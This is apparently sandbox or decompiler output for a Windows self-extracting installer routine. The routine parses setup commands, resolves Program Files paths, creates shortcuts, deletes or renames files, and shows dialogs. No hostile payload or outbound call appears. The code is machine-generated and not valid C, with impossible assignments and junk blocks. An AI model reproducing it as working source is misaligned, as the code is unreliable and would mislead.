                                                                                                                                                      							goto L139;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L127;
                                                                                                                                                      						}
                                                                                                                                                      						do {
                                                                                                                                                      							L127:
                                                                                                                                                      							__bl = __esi->i;
                                                                                                                                                      							__eflags = __bl - 0x20;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								L129:
                                                                                                                                                      								__eax = __ebp - 0xc34;
                                                                                                                                                      								__esi->i = 0;
                                                                                                                                                      								__eax = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      								__eflags = __al;
                                                                                                                                                      								if(__al == 0) {
                                                                                                                                                      									L135:
                                                                                                                                                      									__esi->i = __bl;
                                                                                                                                                      									goto L136;
                                                                                                                                                      								}
                                                                                                                                                      								L130:
                                                                                                                                                      								__edi = __esi;
                                                                                                                                                      								__eflags = __bl - 0x2f;
                                                                                                                                                      								if(__bl != 0x2f) {
                                                                                                                                                      									do {
                                                                                                                                                      										L132:
                                                                                                                                                      										__esi =  &(__esi->i);
                                                                                                                                                      										__eflags = __esi->i - 0x20;
                                                                                                                                                      									} while (__esi->i == 0x20);
                                                                                                                                                      									_push(__esi);
                                                                                                                                                      									__eax = __ebp - 0x834;
                                                                                                                                                      									L134:
                                                                                                                                                      									_push(__eax);
                                                                                                                                                      									__eax = E0040A477();
                                                                                                                                                      									 *__edi = __bl;
                                                                                                                                                      									goto L136;
                                                                                                                                                      								}
                                                                                                                                                      								L131:
                                                                                                                                                      								_t185 =  &(__esi->i); // 0x1
                                                                                                                                                      								__eax = _t185;
                                                                                                                                                      								_push(_t185);
                                                                                                                                                      								 *(__ebp - 0x834) = __bl;
                                                                                                                                                      								__eax = __ebp - 0x833;
                                                                                                                                                      								goto L134;
                                                                                                                                                      							}
                                                                                                                                                      							L128:
                                                                                                                                                      							__eflags = __bl - 0x2f;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								goto L136;
                                                                                                                                                      							}
                                                                                                                                                      							goto L129;
                                                                                                                                                      							L136:
                                                                                                                                                      							__esi =  &(__esi->i);
                                                                                                                                                      							__eflags = __esi->i;
                                                                                                                                                      						} while (__esi->i != 0);
                                                                                                                                                      						__eflags = __edi;
                                                                                                                                                      						if(__edi != 0) {
                                                                                                                                                      							 *__edi = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L139;
                                                                                                                                                      					} else {
                                                                                                                                                      						L123:
                                                                                                                                                      						__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                      						E0040A477(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                      						__eax = E004073AB(__ebp - 0xc33, 0x22);
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax != 0) {
                                                                                                                                                      							 *__eax = 0;
                                                                                                                                                      							__ebp - 0x834 = E0040A477(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                      						}
                                                                                                                                                      						L139:
                                                                                                                                                      						__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                      						if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                      							__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                      							__eax = E00405822(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                      						E00405822(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                      						__eax = E0040AAC2(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                      						__ebp - 0x434 = E004076C8(__ebp - 0x434);
                                                                                                                                                      						__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                      						if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                      							__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                      							E0040A5E2(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                      							__eax = E004076C8(__ebp - 0x434);
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                      						__eax = E0040A477(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                      						__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                      						__eax = __ebp - 0x74dc;
                                                                                                                                                      						if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                      							__eax = __ebp - 0xa4dc;
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                      						__eax = __ebp - 0x434;
                                                                                                                                                      						__eax = E00407690(__ebp - 0x434);
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax == 0) {
                                                                                                                                                      							L147:
                                                                                                                                                      							__ebp - 0x434 = E0040A5E2(__ebp - 0x434, ".lnk");
                                                                                                                                                      							goto L148;
                                                                                                                                                      						} else {
                                                                                                                                                      							L146:
                                                                                                                                                      							__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								L148:
                                                                                                                                                      								__ebp - 0x434 = E004058FF(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                      								 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x834;
                                                                                                                                                      								 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                      								__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x2034;
                                                                                                                                                      								 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                      								__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x84dc;
                                                                                                                                                      								 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                      								__ebp - 0x44dc = E0040A9BD(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                      								__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                      								if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                      									__eax = __ebp - 0x34d4;
                                                                                                                                                      									SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									L152:
                                                                                                                                                      									_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                      									 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                      									if(_t231 != 0) {
                                                                                                                                                      										_t307 = GetFileAttributesA;
                                                                                                                                                      										_t232 = _t309 - 0x1c34;
                                                                                                                                                      										 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                      										 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									L4:
                                                                                                                                                      									while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                      										 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                      										if( *(_t309 - 4) < 0xd) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L152;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *(_t309 - 4) - 0xc;
                                                                                                                                                      									if( *(_t309 - 4) > 0xc) {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      									L8:
                                                                                                                                                      									switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                      										case 0:
                                                                                                                                                      											L9:
                                                                                                                                                      											__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                      											if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L10:
                                                                                                                                                      											GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                      											E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                      											E004076C8(_t309 - 0xc34);
                                                                                                                                                      											E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                      											E00405BAD(_t309 - 0x40dc);
                                                                                                                                                      											E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                      											E00403556(_t309 - 0x30d4);
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_t301 = _t309 - 0x40dc;
                                                                                                                                                      											_t252 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                      											__eflags = _t252;
                                                                                                                                                      											if(_t252 == 0) {
                                                                                                                                                      												L27:
                                                                                                                                                      												E00405BCA(_t309 - 0x40dc);
                                                                                                                                                      												goto L152;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t295 = "%s.%d.tmp";
                                                                                                                                                      												do {
                                                                                                                                                      													L12:
                                                                                                                                                      													SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                      													__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                      													if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                      														L18:
                                                                                                                                                      														_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                      														__eflags = _t257 - 0xffffffff;
                                                                                                                                                      														if(_t257 == 0xffffffff) {
                                                                                                                                                      															goto L26;
                                                                                                                                                      														}
                                                                                                                                                      														L19:
                                                                                                                                                      														_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                      														__eflags = _t261;
                                                                                                                                                      														if(_t261 != 0) {
                                                                                                                                                      															goto L26;
                                                                                                                                                      														} else {
                                                                                                                                                      															 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                      															_push(_t261);
                                                                                                                                                      															goto L22;
                                                                                                                                                      															L22:
                                                                                                                                                      															wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                      															_t311 = _t311 + 0x10;
                                                                                                                                                      															_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                      															__eflags = _t266 - 0xffffffff;
                                                                                                                                                      															if(_t266 != 0xffffffff) {
                                                                                                                                                      																_t60 = _t309 - 4;
                                                                                                                                                      																 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                      																__eflags =  *_t60;
                                                                                                                                                      																_push( *(_t309 - 4));
                                                                                                                                                      																goto L22;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                      																__eflags = _t269;
                                                                                                                                                      																if(_t269 != 0) {
                                                                                                                                                      																	_t270 = E00406EA5();
                                                                                                                                                      																	__eflags = _t270;
                                                                                                                                                      																	if(_t270 != 0) {
                                                                                                                                                      																		MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      																goto L26;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													L13:
                                                                                                                                                      													__eflags = E00406EA5() - 4;
                                                                                                                                                      													if(__eflags == 0) {
                                                                                                                                                      														goto L18;
                                                                                                                                                      													}
                                                                                                                                                      													L14:
                                                                                                                                                      													E00407300(_t301, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                      													E004076C8(_t309 - 0x2034);
                                                                                                                                                      													_t280 = E0040A384(_t301, _t309 - 0x434);
                                                                                                                                                      													 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                      													__eflags = _t280 - 4;
                                                                                                                                                      													if(_t280 < 4) {
                                                                                                                                                      														L16:
                                                                                                                                                      														_t282 = E00407279(_t301, _t309 - 0x1c34, 0);
                                                                                                                                                      														__eflags = _t282;
                                                                                                                                                      														if(_t282 != 0) {
                                                                                                                                                      															goto L27;
                                                                                                                                                      														}
                                                                                                                                                      														L17:
                                                                                                                                                      														 *((char*)(_t309 + E0040A384(_t301, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                      														E0040A289(_t301, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                      														_push(0x14);
                                                                                                                                                      														_pop(_t287);
                                                                                                                                                      														 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                      														 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                      														 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                      														SHFileOperationA(_t309 - 0x34);
                                                                                                                                                      														goto L18;
                                                                                                                                                      													}
                                                                                                                                                      													L15:
                                                                                                                                                      													_t292 = E0040A384(_t301, _t309 - 0x2034);
                                                                                                                                                      													__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                      													if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                      														goto L17;
                                                                                                                                                      													}
                                                                                                                                                      													goto L16;
                                                                                                                                                      													L26:
                                                                                                                                                      													_push(0);
                                                                                                                                                      													_t301 = _t309 - 0x40dc;
                                                                                                                                                      													_t259 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                      													__eflags = _t259;
                                                                                                                                                      												} while (_t259 != 0);
                                                                                                                                                      												goto L27;
                                                                                                                                                      											}
                                                                                                                                                      										case 1:
                                                                                                                                                      											L28:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10);
                                                                                                                                                      											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      												__eax =  *0x41a81c;
                                                                                                                                                      												__eflags =  *0x41a81c;
                                                                                                                                                      												__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                      												__eflags = __bl;
                                                                                                                                                      												if(__bl == 0) {
                                                                                                                                                      													__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                      												}
                                                                                                                                                      												L31:
                                                                                                                                                      												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      												if(__eflags == 0) {
                                                                                                                                                      													__esi = __ebp + 0xc;
                                                                                                                                                      													__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                      												} else {
                                                                                                                                                      													__edi = __ebp - 0x1c34;
                                                                                                                                                      												}
                                                                                                                                                      												__eflags = __bl;
                                                                                                                                                      												if(__bl == 0) {
                                                                                                                                                      													__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                      												} else {
                                                                                                                                                      													__esi = 0;
                                                                                                                                                      												}
                                                                                                                                                      												E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      												__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                      												 *0x41a81c = __eax;
                                                                                                                                                      												__eflags = __bl;
                                                                                                                                                      												if(__bl != 0) {
                                                                                                                                                      													 *__eax = 0;
                                                                                                                                                      												}
                                                                                                                                                      												L39:
                                                                                                                                                      												__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                      												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      												if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                      													__eax = E0040A205(__edi);
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											goto L152;
                                                                                                                                                      										case 2:
                                                                                                                                                      											L41:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10);
                                                                                                                                                      											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      												__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                      											}
                                                                                                                                                      											goto L152;
                                                                                                                                                      										case 3:
                                                                                                                                                      											L43:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10);
                                                                                                                                                      											if( *(__ebp + 0x10) != 0) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L44:
                                                                                                                                                      											__eflags =  *0x419f92;
                                                                                                                                                      											if( *0x419f92 != 0) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L45:
                                                                                                                                                      											__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                      											__esi = __ebp - 0x1c34;
                                                                                                                                                      											 *(__ebp - 0x434) = 0;
                                                                                                                                                      											if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                      												__esi = __ebp - 0x1c33;
                                                                                                                                                      											}
                                                                                                                                                      											__eax = E0040A384(__ecx, __esi);
                                                                                                                                                      											__eflags = __eax - 0x400;
                                                                                                                                                      											if(__eax >= 0x400) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											} else {
                                                                                                                                                      												L48:
                                                                                                                                                      												__al = __esi->i;
                                                                                                                                                      												__eflags = __al - 0x2e;
                                                                                                                                                      												if(__al != 0x2e) {
                                                                                                                                                      													L57:
                                                                                                                                                      													__eflags = __al - 0x5c;
                                                                                                                                                      													if(__al == 0x5c) {
                                                                                                                                                      														L51:
                                                                                                                                                      														__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                      														L52:
                                                                                                                                                      														__eax = __ebp - 0x434;
                                                                                                                                                      														__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                      														if(__eax != 0) {
                                                                                                                                                      															__eflags =  *((char*)(__eax + 1));
                                                                                                                                                      															if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                      																 *__eax = 0;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                      														__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                      														__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                      														__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                      														__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                      														__eax = __ebp - 0x434;
                                                                                                                                                      														__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                      														if(__eax != 0) {
                                                                                                                                                      															__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                      														}
                                                                                                                                                      														goto L152;
                                                                                                                                                      													}
                                                                                                                                                      													L58:
                                                                                                                                                      													__eflags = __al;
                                                                                                                                                      													if(__al == 0) {
                                                                                                                                                      														L60:
                                                                                                                                                      														__eax = __ebp - 0x10;
                                                                                                                                                      														__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                      														if(__eax == 0) {
                                                                                                                                                      															__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                      															__eax = __ebp - 0x14;
                                                                                                                                                      															 *(__ebp - 0xc) = 0x400;
                                                                                                                                                      															RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                      														}
                                                                                                                                                      														__eflags =  *(__ebp - 0x434);
                                                                                                                                                      														if( *(__ebp - 0x434) != 0) {
                                                                                                                                                      															__eax = __ebp - 0x434;
                                                                                                                                                      															__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                      															__ecx = __ebp - 0x434;
                                                                                                                                                      															__ecx = __ebp - 0x433;
                                                                                                                                                      															__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                      															if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                      																__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														__edi = E0040A384(__ecx, __esi);
                                                                                                                                                      														__eax = __ebp - 0x434;
                                                                                                                                                      														__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                      														__eflags = __edi - 0x3ff;
                                                                                                                                                      														if(__edi < 0x3ff) {
                                                                                                                                                      															__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                      														}
                                                                                                                                                      														goto L52;
                                                                                                                                                      													}
                                                                                                                                                      													L59:
                                                                                                                                                      													__eflags = __esi->i - 0x3a;
                                                                                                                                                      													if(__esi->i == 0x3a) {
                                                                                                                                                      														goto L51;
                                                                                                                                                      													}
                                                                                                                                                      													goto L60;
                                                                                                                                                      												}
                                                                                                                                                      												L49:
                                                                                                                                                      												__eflags = __esi->i - 0x5c;
                                                                                                                                                      												if(__esi->i != 0x5c) {
                                                                                                                                                      													goto L57;
                                                                                                                                                      												}
                                                                                                                                                      												L50:
                                                                                                                                                      												__esi =  &(__esi->i);
                                                                                                                                                      												__eflags = __esi;
                                                                                                                                                      												goto L51;
                                                                                                                                                      											}
                                                                                                                                                      										case 4:
                                                                                                                                                      											L67:
                                                                                                                                                      											__eflags =  *0x419f8c - 1;
                                                                                                                                                      											__eflags = __eax - 0x419f8c;
                                                                                                                                                      											 *__edi =  *__edi + __ecx;
                                                                                                                                                      											__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                      											 *__eax =  *__eax + __al;
                                                                                                                                                      											__eflags =  *__eax;
                                                                                                                                                      										case 5:
                                                                                                                                                      											L72:
                                                                                                                                                      											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												L79:
                                                                                                                                                      												 *0x419edf = 0;
                                                                                                                                                      												 *0x419ede = 1;
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L73:
                                                                                                                                                      											__eax = __eax - 0x30;
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												L77:
                                                                                                                                                      												 *0x419edf = 0;
                                                                                                                                                      												L78:
                                                                                                                                                      												 *0x419ede = 0;
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L74:
                                                                                                                                                      											__eax = __eax - 1;
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												goto L79;
                                                                                                                                                      											}
                                                                                                                                                      											L75:
                                                                                                                                                      											__eax = __eax - 1;
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax != 0) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L76:
                                                                                                                                                      											 *0x419edf = 1;
                                                                                                                                                      											goto L78;
                                                                                                                                                      										case 6:
                                                                                                                                                      											L85:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                      											if( *(__ebp + 0x10) != 4) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L86:
                                                                                                                                                      											_push(0);
                                                                                                                                                      											goto L87;
                                                                                                                                                      										case 7:
                                                                                                                                                      											L88:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10) - 1;
                                                                                                                                                      											if( *(__ebp + 0x10) != 1) {
                                                                                                                                                      												L104:
                                                                                                                                                      												__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                      												if( *(__ebp + 0x10) == 7) {
                                                                                                                                                      													__eflags =  *0x419f8c;
                                                                                                                                                      													if( *0x419f8c == 0) {
                                                                                                                                                      														 *0x419f8c = 2;
                                                                                                                                                      													}
                                                                                                                                                      													 *0x419f88 = 1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L89:
                                                                                                                                                      											__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                      											__ebp - 0xc34 = E004076C8(__ebp - 0xc34);
                                                                                                                                                      											 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                      											_push(0);
                                                                                                                                                      											__ebx = "%s%s%d";
                                                                                                                                                      											while(1) {
                                                                                                                                                      												L91:
                                                                                                                                                      												_push( *0x41409c);
                                                                                                                                                      												__eax = __ebp - 0xc34;
                                                                                                                                                      												_push(__ebp - 0xc34);
                                                                                                                                                      												__eax = __ebp - 0x834;
                                                                                                                                                      												_push(__ebx);
                                                                                                                                                      												_push(__ebp - 0x834);
                                                                                                                                                      												__eax =  *__edi();
                                                                                                                                                      												__esp = __esp + 0x14;
                                                                                                                                                      												__eax = __ebp - 0x834;
                                                                                                                                                      												_push(__ebp - 0x834);
                                                                                                                                                      												__eax = __esi->i();
                                                                                                                                                      												__eflags = __eax - 0xffffffff;
                                                                                                                                                      												if(__eax == 0xffffffff) {
                                                                                                                                                      													break;
                                                                                                                                                      												}
                                                                                                                                                      												L90:
                                                                                                                                                      												_t128 = __ebp - 4;
                                                                                                                                                      												 *_t128 =  *(__ebp - 4) + 1;
                                                                                                                                                      												__eflags =  *_t128;
                                                                                                                                                      												_push( *(__ebp - 4));
                                                                                                                                                      											}
                                                                                                                                                      											L92:
                                                                                                                                                      											__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                      											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                      											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L93:
                                                                                                                                                      											__eflags =  *0x41a816;
                                                                                                                                                      											if( *0x41a816 != 0) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L94:
                                                                                                                                                      											__eax = __ebp - 0x1c34;
                                                                                                                                                      											 *(__ebp - 0x234) = 0;
                                                                                                                                                      											__eax = E0040A3AD(__ebp - 0x1c34, 0x2c);
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax != 0) {
                                                                                                                                                      												L100:
                                                                                                                                                      												__eflags =  *(__ebp - 0x234);
                                                                                                                                                      												if( *(__ebp - 0x234) == 0) {
                                                                                                                                                      													__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                      													E0040A477(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                      													__ebp - 0x234 = E0040A477(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                      												}
                                                                                                                                                      												__ebp - 0x1c34 = E0040ABA1(__ebp - 0x1c34);
                                                                                                                                                      												__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                      												 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                      												__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                      												__eflags = __eax - 6;
                                                                                                                                                      												if(__eax == 6) {
                                                                                                                                                      													goto L152;
                                                                                                                                                      												} else {
                                                                                                                                                      													L103:
                                                                                                                                                      													0 = 1;
                                                                                                                                                      													__eflags = 1;
                                                                                                                                                      													 *0x41a815 = 1;
                                                                                                                                                      													 *0x419f78 = 1;
                                                                                                                                                      													__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                      													goto L104;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											L95:
                                                                                                                                                      											__esi = 0;
                                                                                                                                                      											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                      											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                      												goto L100;
                                                                                                                                                      											} else {
                                                                                                                                                      												goto L96;
                                                                                                                                                      											}
                                                                                                                                                      											while(1) {
                                                                                                                                                      												L96:
                                                                                                                                                      												__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                      												if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                      													break;
                                                                                                                                                      												}
                                                                                                                                                      												L97:
                                                                                                                                                      												__esi =  &(__esi->i);
                                                                                                                                                      												__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                      												if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                      													continue;
                                                                                                                                                      												}
                                                                                                                                                      												L98:
                                                                                                                                                      												goto L100;
                                                                                                                                                      											}
                                                                                                                                                      											L99:
                                                                                                                                                      											__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                      											__eax = E0040A477(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                      											 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                      											goto L100;
                                                                                                                                                      										case 8:
                                                                                                                                                      											L108:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                      											if( *(__ebp + 0x10) == 3) {
                                                                                                                                                      												__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                      													__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                      												}
